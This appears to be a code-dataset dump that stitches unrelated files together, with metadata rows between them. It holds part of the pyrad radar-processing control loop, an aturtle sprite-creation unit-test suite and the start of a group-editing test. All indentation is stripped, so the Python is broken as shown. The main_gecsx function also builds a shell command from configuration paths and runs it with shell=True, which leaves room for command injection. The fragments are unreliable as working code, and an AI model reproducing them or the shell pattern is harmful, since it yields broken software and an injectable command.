write_last_state(master_voltime, cfg['lastStateFile'])
dscfg_list[icfg] = dscfg
vol_processed = True
# remove variables from memory
del radar_list
del cfg
del datacfg
del dscfg
del datatypesdescr_list
del dataset_levels
del last_processed
del traj
gc.collect()
nowtime_new = datetime.utcnow()
# for offline testing
# nowtime_new = nowtime_new.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# nowtime_new = nowtime_new.replace(hour=10)
proc_time = (nowtime_new-nowtime).total_seconds()
if vol_processed:
print('Processing time %s s\n' % proc_time)
# if processing end time exceeded finalize processing
if proc_finish is not None:
if nowtime_new >= endtime_proc:
end_proc = True
warn('Allowed processing time exceeded')
break
if proc_time < proc_period:
time.sleep(proc_period-proc_time)
# only do post processing if program properly terminated by user
if end_proc:
# post-processing of the datasets
print('\n\n- Post-processing datasets:')
for icfg, cfg in enumerate(cfg_list):
dscfg = dscfg_list[icfg]
dataset_levels = dataset_levels_list[icfg]
if infostr_list is not None:
infostr = infostr_list[icfg]
else:
infostr = ""
dscfg, traj = _postprocess_datasets(
dataset_levels, cfg, dscfg, infostr=None)
# remove variables from memory
del cfg
del dscfg
del dataset_levels
del traj
gc.collect()
print('- This is the end my friend! See you soon!')
return end_proc
def main_cosmo(cfgfile, starttime=None, endtime=None, trajfile="", infostr=""):
"""
Main flow control. Processes radar data off-line over a period of time
given either by the user, a trajectory file, or determined by the last
volume processed and the current time. Multiple radars can be processed
simultaneously
Parameters
----------
cfgfile : str
path of the main config file
starttime, endtime : datetime object
start and end time of the data to be processed
trajfile : str
path to file describing the trajectory
infostr : str
Information string about the actual data processing
(e.g. 'RUN57'). This string is added to product files.
"""
print("- PYRAD version: {} (compiled {} by {})".format(
pyrad_version.version, pyrad_version.compile_date_time,
pyrad_version.username))
print("- PYART version: {}".format(pyart_version.version))
# Define behaviour of warnings
warnings.simplefilter('always') # always print matching warnings
# warnings.simplefilter('error') # turn matching warnings into exceptions
warnings.formatwarning = _warning_format # define format
cfg = _create_cfg_dict(cfgfile)
datacfg = _create_datacfg_dict(cfg)
starttimes, endtimes, traj = _get_times_and_traj(
trajfile, starttime, endtime, cfg['ScanPeriod'],
last_state_file=cfg['lastStateFile'], trajtype='proc_periods')
if infostr:
print('- Info string : {}'.format(infostr))
# get data types and levels
datatypesdescr_list = list()
for i in range(1, cfg['NumRadars']+1):
datatypesdescr_list.append(
_get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))
dataset_levels = _get_datasets_list(cfg)
masterfilelist, masterdatatypedescr, masterscan = _get_masterfile_list(
datatypesdescr_list[0], starttimes, endtimes, datacfg)
nvolumes = len(masterfilelist)
if nvolumes == 0:
raise ValueError(
"ERROR: Could not find any valid COSMO data between "
"{} and {}".format(
starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
endtimes[-1].strftime('%Y-%m-%d %H:%M:%S')))
print('- Number of volumes to process: {}'.format(nvolumes))
print('- Start time: {}'.format(
starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
print('- end time: {}'.format(endtimes[-1].strftime("%Y-%m-%d %H:%M:%S")))
# initial processing of the datasets
print('\n\n- Initializing datasets:')
dscfg, traj = _initialize_datasets(
dataset_levels, cfg, traj=traj, infostr=infostr)
# process all data files in file list
for masterfile in masterfilelist:
print('\n- master file: {}'.format(os.path.basename(masterfile)))
master_voltime = get_datetime(masterfile, masterdatatypedescr)
# process all data sets
dscfg, traj = _process_datasets(
dataset_levels, cfg, dscfg, None, master_voltime, traj=traj,
infostr=infostr)
gc.collect()
print('- This is the end my friend! See you soon!')
def main_cosmo_rt(cfgfile_list, starttime=None, endtime=None, infostr_list=None,
proc_period=60, proc_finish=None):
"""
main flow control. Processes radar data in real time. The start and end
processing times can be determined by the user. This function is inteded
for a single radar
Parameters
----------
cfgfile_list : list of str
path of the main config files
starttime, endtime : datetime object
start and end time of the data to be processed
infostr_list : list of str
Information string about the actual data processing
(e.g. 'RUN57'). This string is added to product files.
proc_period : int
period of time before starting a new processing round (seconds)
proc_finish : int or None
if set to a value the program will be forced to shut down after the
value (in seconds) from start time has been exceeded
Returns
-------
end_proc : Boolean
If true the program has ended successfully
"""
print("- PYRAD version: %s (compiled %s by %s)" %
(pyrad_version.version, pyrad_version.compile_date_time,
pyrad_version.username))
print("- PYART version: " + pyart_version.version)
# Define behaviour of warnings
warnings.simplefilter('always') # always print matching warnings
# warnings.simplefilter('error') # turn matching warnings into exceptions
warnings.formatwarning = _warning_format # define format
# The processing will be allowed to run for a limited period
if proc_finish is not None:
startime_proc = datetime.utcnow()
# for offline testing
# startime_proc = startime_proc.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# startime_proc = startime_proc.replace(hour=10)
endtime_proc = startime_proc+timedelta(seconds=proc_finish)
if ALLOW_USER_BREAK:
input_queue = _initialize_listener()
cfg_list = []
datacfg_list = []
dscfg_list = []
datatypesdescr_list_list = []
dataset_levels_list = []
last_processed_list = []
for icfg, cfgfile in enumerate(cfgfile_list):
cfg = _create_cfg_dict(cfgfile)
if infostr_list is not None:
infostr = infostr_list[icfg]
else:
infostr = ""
datacfg = _create_datacfg_dict(cfg)
if infostr:
print('- Info string : ' + infostr)
# find out last processed volume
last_processed = read_last_state(cfg['lastStateFile'])
if last_processed is None:
print('- last processed volume unknown')
else:
print('- last processed volume: '+last_processed.strftime(
'%Y%m%d%H%M%S'))
last_processed_list.append(last_processed)
# get data types and levels
datatypesdescr_list = list()
for i in range(1, cfg['NumRadars']+1):
datatypesdescr_list.append(
_get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))
dataset_levels = _get_datasets_list(cfg)
# initial processing of the datasets
print('\n\n- Initializing datasets:')
dscfg, traj = _initialize_datasets(
dataset_levels, cfg, infostr=infostr)
cfg_list.append(cfg)
datacfg_list.append(datacfg)
dscfg_list.append(dscfg)
datatypesdescr_list_list.append(datatypesdescr_list)
dataset_levels_list.append(dataset_levels)
# remove variables from memory
del cfg
del datacfg
del dscfg
del datatypesdescr_list
del dataset_levels
del last_processed
del traj
gc.collect()
end_proc = False
while not end_proc:
if ALLOW_USER_BREAK:
# check if user has requested exit
try:
user_input = input_queue.get_nowait()
end_proc = user_input
warn('Program terminated by user')
break
except queue.Empty:
pass
nowtime = datetime.utcnow()
# for offline testing
# nowtime = nowtime.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# nowtime = nowtime.replace(hour=10)
# if processing end time exceeded finalize processing
if proc_finish is not None:
if nowtime >= endtime_proc:
end_proc = True
warn('Allowed processing time exceeded')
break
# end time has been set and current time older than end time
# quit processing
if endtime is not None:
if nowtime > endtime:
end_proc = True
break
# start time has been set. Check if current time has to be
# processed. If not sleep until next proc_period
if starttime is not None:
if nowtime < starttime:
time.sleep(proc_period)
continue
vol_processed = False
for icfg, cfg in enumerate(cfg_list):
if ALLOW_USER_BREAK:
# check if user has requested exit
try:
user_input = input_queue.get_nowait()
end_proc = user_input
warn('Program terminated by user')
break
except queue.Empty:
pass
datacfg = datacfg_list[icfg]
dscfg = dscfg_list[icfg]
datatypesdescr_list = datatypesdescr_list_list[icfg]
dataset_levels = dataset_levels_list[icfg]
last_processed = last_processed_list[icfg]
if infostr_list is not None:
infostr = infostr_list[icfg]
else:
infostr = ""
# wait until new files are available
masterfile, masterdatatypedescr, last_processed = _wait_for_files(
nowtime, datacfg, datatypesdescr_list[0],
last_processed=last_processed)
if masterfile is None:
last_processed_list[icfg] = last_processed
if last_processed is not None:
write_last_state(last_processed, cfg['lastStateFile'])
continue
print('\n- master file: ' + os.path.basename(masterfile))
master_voltime = get_datetime(masterfile, masterdatatypedescr)
# process all data sets
dscfg, traj = _process_datasets(
dataset_levels, cfg, dscfg, None, master_voltime,
infostr=infostr)
last_processed_list[icfg] = master_voltime
write_last_state(master_voltime, cfg['lastStateFile'])
dscfg_list[icfg] = dscfg
vol_processed = True
# remove variables from memory
del cfg
del datacfg
del dscfg
del datatypesdescr_list
del dataset_levels
del last_processed
del traj
gc.collect()
nowtime_new = datetime.utcnow()
# for offline testing
# nowtime_new = nowtime_new.replace(
# year=endtime.year, month=endtime.month, day=endtime.day)
# nowtime_new = nowtime_new.replace(hour=10)
proc_time = (nowtime_new-nowtime).total_seconds()
if vol_processed:
print('Processing time %s s\n' % proc_time)
# if processing end time exceeded finalize processing
if proc_finish is not None:
if nowtime_new >= endtime_proc:
end_proc = True
warn('Allowed processing time exceeded')
break
if proc_time < proc_period:
time.sleep(proc_period-proc_time)
print('- This is the end my friend! See you soon!')
return end_proc
def main_gecsx(cfgfile, starttime=None, endtime=None, infostr="",
gather_plots = True):
"""
Main flow control. Processes radar data off-line over a period of time
given either by the user, a trajectory file, or determined by the last
volume processed and the current time. Multiple radars can be processed
simultaneously
Parameters
----------
cfgfile : str
path of the main config file
time, endtime : datetime object
start and end time of the radar data to be used as reference for
gecsx
infostr : str
Information string about the actual data processing
(e.g. 'RUN57'). This string is added to product files.
"""
GECSX_MANDATORY = ['frequency', 'radar_beam_width_h','pulse_width',
'txpwrh', 'AntennaGainH', 'mflossh', 'lrxh']
GECSX_OPTIONAL = ['attg', 'AzimTol', 'mosotti_factor', 'refcorr',
'RadarPosition']
print("- PYRAD version: {} (compiled {} by {})".format(
pyrad_version.version, pyrad_version.compile_date_time,
pyrad_version.username))
print("- PYART version: {}".format(pyart_version.version))
# Define behaviour of warnings
warnings.simplefilter('always') # always print matching warnings
# warnings.simplefilter('error') # turn matching warnings into exceptions
warnings.formatwarning = _warning_format # define format
cfg = _create_cfg_dict(cfgfile)
datacfg = _create_datacfg_dict(cfg)
if starttime is None:
starttime = datetime.now()
endtime = starttime
if endtime is None:
endtime = datetime.now()
if infostr:
print('- Info string : {}'.format(infostr))
if cfg['datapath'] is not None:
starttimes, endtimes, _ = _get_times_and_traj(
None, starttime, endtime, cfg['ScanPeriod'],
last_state_file=cfg['lastStateFile'], trajtype='proc_periods')
# get data types and levels
datatypesdescr_list = list()
for i in range(1, cfg['NumRadars']+1):
datatypesdescr_list.append(
_get_datatype_list(cfg, radarnr='RADAR'+'{:03d}'.format(i)))
dataset_levels = _get_datasets_list(cfg)
if cfg['datapath'] is not None:
masterfilelist, masterdatatypedescr, _ = _get_masterfile_list(
datatypesdescr_list[0], starttimes, endtimes, datacfg,
datacfg['ScanList'])
nvolumes = len(masterfilelist)
if nvolumes == 0:
warn("WARNING: Could not find any valid radar data between "
"{} and {}".format(
starttimes[0].strftime('%Y-%m-%d %H:%M:%S'),
endtimes[-1].strftime('%Y-%m-%d %H:%M:%S')))
warn('WARNING: Proceeding without radar reference')
print('- Number of volumes to process: {}'.format(nvolumes))
print('- Start time: {}'.format(
starttimes[0].strftime("%Y-%m-%d %H:%M:%S")))
print('- end time: {}'.format(endtimes[-1].
strftime("%Y-%m-%d %H:%M:%S")))
else:
masterfilelist = []
# For GECSX we treat only one master file, since the method does not
# depend on time
if len(masterfilelist) != 0:
masterfile = masterfilelist[0]
master_voltime = get_datetime(masterfile, masterdatatypedescr)
# get data of master radar
radar_list = _get_radars_data(
master_voltime, datatypesdescr_list, datacfg)
else:
radar_list = []
# initial processing of the datasets
print('\n\n- Initializing datasets:')
dscfg, _ = _initialize_datasets(
dataset_levels, cfg, infostr=infostr)
# For GECSX we copy some keys from the datacfg dict to the dataset dict
for dset in dscfg.values():
for k in GECSX_MANDATORY:
if k in dset.keys():
continue
try:
dset[k] = datacfg[k]
except:
msg = 'Mandatory GECSX key {:s} is missing from loc file'.format(k)
raise ValueError(msg)
for k in GECSX_OPTIONAL:
if k in datacfg.keys():
dset[k] = datacfg[k]
if len(radar_list) == 0:
valid_radarpos = False
if 'RadarPosition' in dset:
if ('latitude' in dset['RadarPosition'] and
'longitude' in dset['RadarPosition'] and
'altitude' in dset['RadarPosition']):
valid_radarpos = True
if not valid_radarpos:
raise ValueError('When no radar data is provided, the structure ' +
'"RadarPosition" with field "altitude", "latitude" '
+ 'and "longitude" must be provided in the loc file')
for k in dset['RadarPosition'].keys():
if type(dset['RadarPosition'][k]) != list:
dset['RadarPosition'][k] = [dset['RadarPosition'][k]]
# process all data sets
dscfg, _ = _process_datasets(
dataset_levels, cfg, dscfg, radar_list, None, None,
infostr=infostr)
gc.collect()
if gather_plots:
img_ext = cfg['imgformat']
for dset in dscfg:
gather_dir = str(Path(cfg['saveimgbasepath'], cfg['name'], dset))
print('Copying all generated figures into dir {:s}...'.format(
gather_dir + '/ALL_FIGURES/'))
for ex in img_ext:
if os.path.exists(gather_dir):
cmd = ('cd {:s}; mkdir -p ALL_FIGURES; find . -type f -name "*.{:s}" '.format(gather_dir,
ex) + '-exec cp {} ALL_FIGURES \\;')
subprocess.call(cmd, shell = True)
print('- This is the end my friend! See you soon!')
| 35.520897
| 109
| 0.613987
| 3,997
| 34,846
| 5.178634
| 0.102077
| 0.026378
| 0.008261
| 0.007971
| 0.786705
| 0.779651
| 0.766607
| 0.758829
| 0.744964
| 0.740036
| 0
| 0.00305
| 0.303736
| 34,846
| 980
| 110
| 35.557143
| 0.850095
| 0.231016
| 0
| 0.736577
| 1
| 0
| 0.115207
| 0
| 0.008389
| 0
| 0
| 0
| 0
| 1
| 0.008389
| false
| 0.008389
| 0.050336
| 0
| 0.062081
| 0.083893
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f7d0c16bcd4756a36c52dc85e6d2621f63eaa23
| 18,255
|
py
|
Python
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 3
|
2019-12-23T15:25:39.000Z
|
2022-02-25T22:09:49.000Z
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 55
|
2019-12-27T14:05:02.000Z
|
2020-02-01T09:53:42.000Z
|
tests/test_sprites_package.py
|
fabricejumel/python-aturtle
|
008f71a5e506cb58465f85ee9dc8ea1bffa6fc49
|
[
"MIT"
] | 1
|
2020-02-25T08:18:51.000Z
|
2020-02-25T08:18:51.000Z
|
# ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
import contextlib
import pathlib
import unittest
from unittest import mock
from aturtle import sprites
from aturtle.shapes import bitmap, vector
class TestTarget(unittest.TestCase):
def setUp(self):
self.bitmap_shape_mock = mock.Mock()
self.vector_shape_mock = mock.Mock()
self.bitmap_sprite_mock = mock.Mock()
self.vector_sprite_mock = mock.Mock()
self.exit_stack = contextlib.ExitStack()
patches = (
mock.patch('aturtle.sprites._BitmapShape', self.bitmap_shape_mock),
mock.patch('aturtle.sprites._VectorShape', self.vector_shape_mock),
mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
)
for patch in patches:
self.exit_stack.enter_context(patch)
def tearDown(self):
self.exit_stack.close()
def test_create_with_canvas_target_works(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(canvas, 'filename')
# One shape was created with filename keyword argument.
self.bitmap_shape_mock.assert_called_once_with(filename='filename')
# One sprite was created.
self.bitmap_sprite_mock.assert_called_once()
# The first passed argument is the canvas.
first_argument = self.bitmap_sprite_mock.call_args.args[0]
self.assertIs(first_argument, canvas)
def test_create_with_window_target_works(self):
canvas = object()
window = mock.Mock()
window.canvas = canvas
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(window, 'filename')
# One shape was created with filename keyword argument.
self.bitmap_shape_mock.assert_called_once_with(filename='filename')
# One sprite was created.
self.bitmap_sprite_mock.assert_called_once()
# The first passed argument is the window canvas.
first_argument = self.bitmap_sprite_mock.call_args.args[0]
self.assertIs(first_argument, canvas)
class TestFullyPatchedNoArgs(unittest.TestCase):
def setUp(self):
self.bitmap_shape_mock = mock.Mock()
self.vector_shape_mock = mock.Mock()
self.bitmap_sprite_mock = mock.Mock()
self.vector_sprite_mock = mock.Mock()
self.exit_stack = contextlib.ExitStack()
patches = (
mock.patch('aturtle.sprites._BitmapShape', self.bitmap_shape_mock),
mock.patch('aturtle.sprites._VectorShape', self.vector_shape_mock),
mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
)
for patch in patches:
self.exit_stack.enter_context(patch)
def tearDown(self):
self.exit_stack.close()
def test_create_sprite_from_str(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(canvas, 'filename')
# One shape was created with filename keyword argument.
self.bitmap_shape_mock.assert_called_once_with(filename='filename')
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_path(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
path = pathlib.Path()
sprite = sprites.create_sprite(canvas, path)
# One shape was created with filename keyword argument.
self.bitmap_shape_mock.assert_called_once_with(filename=path)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_bytes(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(canvas, b'image-payload')
# One shape was created with filename keyword argument.
self.bitmap_shape_mock.assert_called_once_with(data=b'image-payload')
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_list(self):
canvas = object()
shape = object()
self.vector_shape_mock.return_value = shape
the_list = [1, 2, 3, 4]
sprite = sprites.create_sprite(canvas, the_list)
# One shape was created with filename keyword argument.
self.vector_shape_mock.assert_called_once_with(the_list)
# One sprite was created with the expected arguments.
self.vector_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.vector_sprite_mock.return_value)
class TestFullyPatchedWithArgs(unittest.TestCase):
def setUp(self):
self.bitmap_shape_mock = mock.Mock()
self.vector_shape_mock = mock.Mock()
self.bitmap_sprite_mock = mock.Mock()
self.vector_sprite_mock = mock.Mock()
self.exit_stack = contextlib.ExitStack()
patches = (
mock.patch('aturtle.sprites._BitmapShape', self.bitmap_shape_mock),
mock.patch('aturtle.sprites._VectorShape', self.vector_shape_mock),
mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
)
for patch in patches:
self.exit_stack.enter_context(patch)
def tearDown(self):
self.exit_stack.close()
def test_create_sprite_from_str(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(
canvas,
'filename',
anchor=(42, 24),
angle=180,
rotations=18,
pre_rotate=False,
)
# One shape was created with filename, rotations, and pre_rotate args.
self.bitmap_shape_mock.assert_called_once_with(
filename='filename',
rotations=18,
pre_rotate=False,
)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_path(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
path = pathlib.Path()
sprite = sprites.create_sprite(
canvas,
path,
anchor=(42, 24),
angle=180,
rotations=18,
pre_rotate=False,
)
# One shape was created with filename, rotations, and pre_rotate args.
self.bitmap_shape_mock.assert_called_once_with(
filename=path,
rotations=18,
pre_rotate=False,
)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_bytes(self):
canvas = object()
shape = object()
self.bitmap_shape_mock.return_value = shape
sprite = sprites.create_sprite(
canvas,
b'image-payload',
anchor=(42, 24),
angle=180,
rotations=18,
pre_rotate=False,
)
# One shape was created with filename, rotations, and pre_rotate args.
self.bitmap_shape_mock.assert_called_once_with(
data=b'image-payload',
rotations=18,
pre_rotate=False,
)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
def test_create_sprite_from_list(self):
canvas = object()
shape = object()
self.vector_shape_mock.return_value = shape
the_list = [1, 2, 3, 4]
sprite = sprites.create_sprite(
canvas,
the_list,
anchor=(42, 24),
angle=180,
fill_color='fill-color',
line_color='line-color',
line_width='line-width',
rotations=18,
pre_rotate=True,
)
# One shape was created with the expected arguments.
self.vector_shape_mock.assert_called_once_with(
the_list,
fill_color='fill-color',
line_color='line-color',
line_width='line-width',
rotations=18,
pre_rotate=True,
)
# One sprite was created with the expected arguments.
self.vector_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.vector_sprite_mock.return_value)
class TestPartiallyPatchedNoArgs(unittest.TestCase):
def setUp(self):
self.bitmap_sprite_mock = mock.Mock()
self.vector_sprite_mock = mock.Mock()
self.exit_stack = contextlib.ExitStack()
patches = (
mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
)
for patch in patches:
self.exit_stack.enter_context(patch)
def tearDown(self):
self.exit_stack.close()
def test_create_sprite_from_vector_shape(self):
canvas = object()
shape = vector.Shape([1, 2, 3, 4])
sprite = sprites.create_sprite(canvas, shape)
# One sprite was created with the expected arguments.
self.vector_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.vector_sprite_mock.return_value)
def test_create_sprite_from_bitmap_shape(self):
canvas = object()
class TestBitmapShape(bitmap.Shape):
def __init__(self):
pass
shape = TestBitmapShape()
sprite = sprites.create_sprite(canvas, shape)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(0, 0),
angle=0,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
class TestPartiallyPatchedWithArgs(unittest.TestCase):
def setUp(self):
self.bitmap_sprite_mock = mock.Mock()
self.vector_sprite_mock = mock.Mock()
self.exit_stack = contextlib.ExitStack()
patches = (
mock.patch('aturtle.sprites.BitmapSprite', self.bitmap_sprite_mock),
mock.patch('aturtle.sprites.VectorSprite', self.vector_sprite_mock),
)
for patch in patches:
self.exit_stack.enter_context(patch)
def tearDown(self):
self.exit_stack.close()
def test_create_sprite_from_vector_shape(self):
canvas = object()
shape = vector.Shape([1, 2, 3, 4])
sprite = sprites.create_sprite(
canvas,
shape,
anchor=(42, 24),
angle=180,
)
# One sprite was created with the expected arguments.
self.vector_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.vector_sprite_mock.return_value)
def test_create_sprite_from_bitmap_shape(self):
canvas = object()
class TestBitmapShape(bitmap.Shape):
def __init__(self):
pass
shape = TestBitmapShape()
sprite = sprites.create_sprite(
canvas,
shape,
anchor=(42, 24),
angle=180,
)
# One sprite was created with the expected arguments.
self.bitmap_sprite_mock.assert_called_once_with(
canvas,
shape,
anchor=(42, 24),
angle=180,
speed=360,
m_speed=None,
r_speed=None,
easing=None,
m_easing=None,
r_easing=None,
m_callback=None,
r_callback=None,
fps=80,
update=False,
)
# Result is what calling the Sprite class produced.
self.assertIs(sprite, self.bitmap_sprite_mock.return_value)
class TestNonPatched(unittest.TestCase):
def test_create_sprite_with_unsupported_type_raises_TypeError(self):
canvas = object()
bad_typed_shape_sources = (
bool(),
int(),
float(),
tuple(),
dict(),
range(42),
(i for i in 'a-generator-object'),
)
for bad_shape_source in bad_typed_shape_sources:
with self.subTest(bad_shape_source=bad_shape_source):
with self.assertRaises(TypeError):
_sprite = sprites.create_sprite(canvas, bad_shape_source)
| 27.40991
| 80
| 0.572227
| 2,001
| 18,255
| 4.977511
| 0.070465
| 0.052209
| 0.048193
| 0.060241
| 0.932731
| 0.923494
| 0.923494
| 0.923494
| 0.92008
| 0.915562
| 0
| 0.016282
| 0.333826
| 18,255
| 665
| 81
| 27.451128
| 0.80273
| 0.122816
| 0
| 0.844639
| 0
| 0
| 0.040205
| 0.028056
| 0
| 0
| 0
| 0
| 0.085339
| 1
| 0.059081
| false
| 0.004376
| 0.013129
| 0
| 0.089716
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fa2372dd80da91db80b4b19c17c2c66e55230b7
| 1,910
|
py
|
Python
|
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | 3
|
2020-04-21T10:58:42.000Z
|
2021-05-31T17:14:02.000Z
|
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | null | null | null |
test/group_tests/test_edit_group.py
|
katghe/main
|
1d3b9e666a84c49d335d46eb62f27bf04aca519a
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
def test_edit_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="sdfsdf"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group_data = Group(name="Group21")
app.group.edit_group_by_id(group.id, new_group_data)
assert len(old_groups) == app.group.count()
new_groups = db.get_group_list()
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_edit_group_header(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(header="sdfsdf"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group_data = Group(header="header21")
app.group.edit_group_by_id(group.id, new_group_data)
assert len(old_groups) == app.group.count()
new_groups = db.get_group_list()
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_edit_group_footer(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(footer="sdfsdf"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group_data = Group(footer="footer21")
app.group.edit_group_by_id(group.id, new_group_data)
assert len(old_groups) == app.group.count()
new_groups = db.get_group_list()
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| 41.521739
| 113
| 0.71623
| 316
| 1,910
| 3.996835
| 0.120253
| 0.083135
| 0.114014
| 0.114014
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0.901821
| 0
| 0.005562
| 0.15288
| 1,910
| 45
| 114
